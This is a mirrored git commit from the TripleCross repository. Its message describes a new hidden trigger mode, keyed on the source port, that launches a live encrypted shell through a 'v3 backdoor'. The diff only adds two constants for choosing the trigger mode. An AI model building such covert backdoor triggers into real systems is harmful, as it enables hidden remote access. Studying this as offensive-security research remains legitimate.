mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-28 04:13:08 +08:00
Added new hidden payload stream mode, now triggered using the source port. Fully integrated already, can select between that and seqnum in client. Both launch live encrypted shell via v3 backdoor
This commit is contained in:
@@ -27,6 +27,9 @@ int client_mode = CLIENT_MODE_LIVE_COMMAND;
|
||||
|
||||
#define GC_SERVER_CLOSE_CONN "EXIT"
|
||||
|
||||
#define CLIENT_MULTI_PACKET_TRIGGER_MODE_SEQ_NUM 0
|
||||
#define CLIENT_MULTI_PACKET_TRIGGER_MODE_SRC_PORT 1
|
||||
|
||||
|
||||
/**
|
||||
* @brief Manages the result of a possible global command understood by the client overall
|
||||
|
||||
Reference in New Issue
Block a user